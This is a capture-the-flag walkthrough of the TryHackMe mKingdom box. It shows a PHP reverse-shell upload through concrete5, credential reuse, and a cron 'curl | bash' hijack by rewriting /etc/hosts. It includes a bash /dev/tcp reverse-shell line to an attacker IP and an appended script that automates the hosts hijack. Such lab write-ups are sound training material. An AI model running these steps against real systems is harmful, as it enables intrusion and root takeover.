CTF : mKingdom

CTF mKingdom writeup. Source: THM. Announced difficulty level: Easy

Posted by Boula-Bytes on 06 July 2024

Information

  • IP: 10.10.239.253
  • MYIP: 10.11.96.62

First enumeration

Basics

  • NMAP
```console
nmap -p85 -A 10.10.239.253
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-05 22:51 CEST
Nmap scan report for 10.10.239.253
Host is up (0.032s latency).

PORT   STATE SERVICE VERSION
85/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: 0H N0! PWN3D 4G4IN

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.50 seconds
```

Vulnerability search

```console
dirsearch -r -u http://10.10.239.253:85
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/boula/CTF/mKingdom/reports/http_10.10.239.253_85/_24-07-05_22-53-40.txt

Target: http://10.10.239.253:85/

[22:53:40] Starting:
[...]
[22:53:57] 301 -  314B  - /app  ->  http://10.10.239.253:85/app/
```

Going to http://10.10.239.253:85/app/ redirects us to http://10.10.239.253:85/app/castle/, which turns out to be a blog running the concrete5 CMS.

So I tried to log in with the credentials admin:password and... it works :)

Next we head to the system settings and, in the file types section, add php to the list of allowed file types (concrete5 refuses uploads whose extension is not on that list).

Now I prepared a PHP reverse shell and uploaded it via the file manager.

The file manager even shows the uploaded file's location: http://10.10.239.253:85/app/castle/application/files/3217/2021/3624/shell.php

Exploit

Listen on port 1234 with netcat:

```bash
nc -nvlp 1234
```

Then request the uploaded file so the web server executes it and the shell connects back to us:

```bash
curl http://10.10.239.253:85/app/castle/application/files/3217/2021/3624/shell.php
```

And I got a shell :)

Privilege escalation

Enumeration for privesc

There are two regular users:

```console
mario:x:1001:1001:,,,:/home/mario:/bin/bash
toad:x:1002:1002:,,,:/home/toad:/bin/bash
```

In /var/www/html/app/castle/application/config/database.php

I found these database credentials:

```php
<?php

return [
    'default-connection' => 'concrete',
    'connections' => [
        'concrete' => [
            'driver' => 'c5_pdo_mysql',
            'server' => 'localhost',
            'database' => 'mKingdom',
            'username' => 'toad',
            'password' => 'toadisthebest',
            'character_set' => 'utf8',
            'collation' => 'utf8_unicode_ci',
        ],
    ],
];
```

Let's try those creds for user toad :

```bash
su - toad
```

Ok, we're now toad :)

The env command gives an interesting piece of information: PWD_token=aWthVGVOVEFOdEVTCg=

The value looks like base64 with a padding character missing, so I completed the padding and decoded it:

```bash
echo -ne 'aWthVGVOVEFOdEVTCg==' | base64 -d -
ikaTeNTANtES
```

The trailing Cg== is just a newline that was encoded along with the value, so the password itself is ikaTeNTANtES. Using this we can su to mario :)
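The token as printed by env ends in a single =, while the decode above needed two: base64 -d rejects input whose padding is short, which is a common way for a secret copied out of an environment variable or a config file to fail to decode. As an added example, not part of the original writeup, this small helper re-pads the string before decoding; the sample inputs are the page's token and a constructed value.

```shell
#!/bin/sh
# Added example, not code from the original writeup: decode base64 whose
# trailing '=' padding was lost or truncated (as with the PWD_token string).
b64_decode_lenient() {
    # $1: base64 text, possibly with missing padding or stray whitespace
    s=$(printf '%s' "$1" | tr -d '[:space:]')
    s="${s%%=*}"                                # drop whatever padding is left ...
    while [ $(( ${#s} % 4 )) -ne 0 ]; do        # ... and re-pad to a multiple of 4
        s="$s="
    done
    printf '%s' "$s" | base64 -d
}

# The page's token with its single '=' (constructed call, value from the writeup).
b64_decode_lenient 'aWthVGVOVEFOdEVTCg='
```

Because the encoded value ends in a newline (the Cg== tail), the decoded output ends in one too; capturing it with $(...) strips that newline, which is what you want before passing it to su.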

Using pspy, I found a cron job set up by root that executes this command:

```console
/bin/sh -c curl mkingdom.thm:85/app/castle/application/counter.sh | bash >> /var/log/up.log
```

So root fetches counter.sh over plain HTTP from mkingdom.thm and pipes it straight into bash. And with this command:

```bash
find / -writable -print 2>/dev/null
```

I found that /etc/hosts is writable by the user mario, which means we control what mkingdom.thm resolves to on the box.

Exploit

  • On the attacker box :

First we create the directory structure matching the path the cron job requests:

```bash
mkdir -p app/castle/application/
```

Then craft a file named counter.sh that sends a reverse shell back to us:

```bash
echo "bash -i >& /dev/tcp/10.11.96.62/1235 0>&1" > app/castle/application/counter.sh
```

Everything is ready; serve the file over HTTP on port 85, the port used in the cron job's URL (a privileged port, hence sudo):

```bash
sudo python3 -m http.server 85
```

In another terminal, listen for the root shell:

```bash
nc -nlvp 1235
```

  • On the victim box:

Now I edit /etc/hosts and replace 127.0.1.1 (the address mkingdom.thm resolves to locally) with the IP of the attacker box, so the cron job's curl fetches counter.sh from us instead of from the local web server. Once that is done we just have to wait about a minute for the cron job to fire...

And we got root access \o/
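As an added example, not code from the original writeup, the following script rehearses the hijack described above against a throwaway copy of the hosts file: it extracts the host the cron command downloads from, checks the two preconditions (the hosts file is writable and curl output is piped into a shell), emulates first-match /etc/hosts resolution, and rewrites the existing entry in place. The hostname mkingdom.thm, the cron command and the attacker IP 10.11.96.62 come from the writeup; the hosts file path is a parameter and the demo builds a constructed copy of a typical Ubuntu hosts file, never touching the real /etc/hosts. It goes slightly beyond the page in that it also handles a URL with a scheme and a name that is absent from the file.

```shell
#!/bin/sh
# Added example, not code from the original writeup: rehearse the
# "curl <host> | bash" root-cron hijack that relies on a writable hosts file.
# Assumptions: the hostname (mkingdom.thm), the cron command and the attacker
# IP (10.11.96.62) are taken from the writeup; the hosts file is a parameter so
# everything runs on a throwaway copy rather than the real /etc/hosts.
set -u

# Hostname the cron command downloads from: the word after the last "curl",
# with an optional scheme removed and anything from ":port" or "/path" on cut off.
cron_target_host() {
    printf '%s\n' "$1" | sed -nE 's|^.*curl +||p' | sed -E 's|^https?://||; s|[:/ ].*$||'
}

# Preconditions for the hijack: the hosts file is writable by us and the cron
# command pipes whatever curl fetched into a shell.
can_hijack() {
    # $1: hosts file, $2: cron command line
    [ -w "$1" ] && printf '%s\n' "$2" | grep -Eq 'curl .*\| *(ba)?sh'
}

# Emulate resolver behaviour on a hosts file: comment lines are skipped and the
# first remaining line that lists the name wins.
hosts_resolve() {
    # $1: hosts file, $2: hostname
    awk -v h="$2" '
        /^[[:space:]]*#/ || NF < 2 { next }
        { for (i = 2; i <= NF; i++) if ($i == h) { print $1; exit } }
    ' "$1"
}

# Point the name at the attacker. Existing entries are rewritten rather than a
# new line appended, because an appended line would lose to the earlier
# 127.0.1.1 entry; if the name is absent, a line is appended instead.
hosts_hijack() {
    # $1: hosts file, $2: hostname, $3: attacker IP
    local hosts="$1" host="$2" ip="$3" tmp
    if [ -n "$(hosts_resolve "$hosts" "$host")" ]; then
        tmp=$(mktemp)
        awk -v h="$host" -v ip="$ip" '
            /^[[:space:]]*#/ { print; next }
            { for (i = 2; i <= NF; i++) if ($i == h) { $1 = ip; break }
              print }
        ' "$hosts" > "$tmp"
        # Overwrite in place: /etc/hosts may be writable while /etc itself is
        # not, in which case renaming a temporary file over it would fail.
        cat "$tmp" > "$hosts" && rm -f "$tmp"
    else
        printf '%s %s\n' "$ip" "$host" >> "$hosts"
    fi
}

# Demo on a constructed copy of a typical Ubuntu hosts file (not the target's).
demo() {
    local hosts cron target
    hosts=$(mktemp)
    printf '127.0.0.1\tlocalhost\n127.0.1.1\tmkingdom.thm\n' > "$hosts"
    cron='/bin/sh -c curl mkingdom.thm:85/app/castle/application/counter.sh | bash >> /var/log/up.log'
    target=$(cron_target_host "$cron")
    echo "cron fetches from $target, which currently resolves to $(hosts_resolve "$hosts" "$target")"
    if can_hijack "$hosts" "$cron"; then
        hosts_hijack "$hosts" "$target" 10.11.96.62
        echo "after hijack: $target -> $(hosts_resolve "$hosts" "$target")"
    fi
    rm -f "$hosts"
}
demo
```

Two details matter on a real target: the resolver stops at the first matching line, so simply appending "10.11.96.62 mkingdom.thm" at the bottom of /etc/hosts would not beat the existing 127.0.1.1 entry, which is why that entry is rewritten; and since the hijack only redirects the hostname, the attacker's HTTP server must still listen on port 85 and serve the exact path /app/castle/application/counter.sh that the cron job requests.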